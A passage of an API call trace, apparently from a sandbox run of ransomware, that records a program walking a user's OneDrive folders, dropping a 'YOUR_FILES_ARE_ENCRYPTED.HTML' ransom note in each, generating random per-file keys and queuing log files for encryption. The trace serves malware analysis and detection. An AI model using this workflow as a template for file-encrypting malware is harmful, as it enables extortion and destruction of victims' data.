ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.283] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.283] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.283] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.283] lstrlenW (lpString=".mui") returned 4 [0163.283] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.283] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.283] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.284] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: 
lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.286] CloseHandle (hObject=0x5b0) returned 1 [0163.287] GetProcessHeap () returned 0x270000 [0163.288] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.288] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zu-za", cAlternateFileName="")) returned 1 [0163.288] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za") returned 77 [0163.288] GetProcessHeap () returned 0x270000 [0163.288] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.288] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za" [0163.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*" [0163.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*", 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.288] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.288] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad487670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.289] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.289] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.289] PathFindExtensionW 
(pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.289] lstrlenW (lpString=".mui") returned 4 [0163.289] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.289] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad487670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.289] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.289] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zu-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.289] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.292] CloseHandle (hObject=0x5b0) returned 1 [0163.292] GetProcessHeap () returned 0x270000 [0163.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.293] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zu-za", cAlternateFileName="")) returned 0 [0163.293] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.293] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.294] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.296] CloseHandle (hObject=0x58c) returned 1 [0163.297] GetProcessHeap () returned 0x270000 [0163.297] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.297] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad4ad7d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa4627290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x44aa8, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe") returned 69 [0163.298] lstrcmpW (lpString1="OneDrive.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.298] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0163.298] lstrlenW (lpString=".exe") returned 4 [0163.298] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0163.298] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned 62 [0163.298] GetProcessHeap () returned 0x270000 [0163.298] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.298] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup" [0163.298] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*" [0163.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned 67 [0163.298] GetProcessHeap () 
returned 0x270000 [0163.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" [0163.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*" [0163.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.302] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.302] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1f02, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085814_a24-9b8.log", cAlternateFileName="2021-0~1.LOG")) returned 1 [0163.302] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log") returned 97 [0163.302] lstrcmpW (lpString1="2021-02-23_085814_a24-9b8.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.302] PathFindExtensionW (pszPath="2021-02-23_085814_a24-9b8.log") returned=".log" [0163.302] lstrlenW (lpString=".log") returned 4 [0163.302] PathFindExtensionW (pszPath="2021-02-23_085814_a24-9b8.log") returned=".log" [0163.302] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.302] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=7938) returned 1 [0163.303] GetProcessHeap () returned 0x270000 [0163.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.307] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="11") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="D9") returned 2 [0163.307] wsprintfW (in: 
param_1=0x4ebce0e, param_2="%02X" | out: param_1="27") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="A7") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="AB") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="EC") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="85") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="0C") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="48") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="8A") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="A1") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="73") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="00") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="91") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="78") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="77") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="0B") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="7B") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="0D") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="B4") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="D4") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="87") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="C7") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="1D") returned 2 
[0163.308] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="92") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="E8") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="B0") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="02") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="E5") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="02") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="A9") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="5C") returned 2 [0163.309] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" [0163.309] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.309] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.309] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa395bc50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa395bc50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085814_b38-b30.log", 
cAlternateFileName="2021-0~2.LOG")) returned 1 [0163.309] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log") returned 97 [0163.309] lstrcmpW (lpString1="2021-02-23_085814_b38-b30.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.309] PathFindExtensionW (pszPath="2021-02-23_085814_b38-b30.log") returned=".log" [0163.309] lstrlenW (lpString=".log") returned 4 [0163.309] PathFindExtensionW (pszPath="2021-02-23_085814_b38-b30.log") returned=".log" [0163.309] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085814_b38-b30.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.311] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=17496) returned 1 [0163.311] GetProcessHeap () returned 0x270000 [0163.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0163.329] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="D5") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="9C") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="54") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="C5") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="64") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="B0") returned 2 [0163.330] wsprintfW (in: 
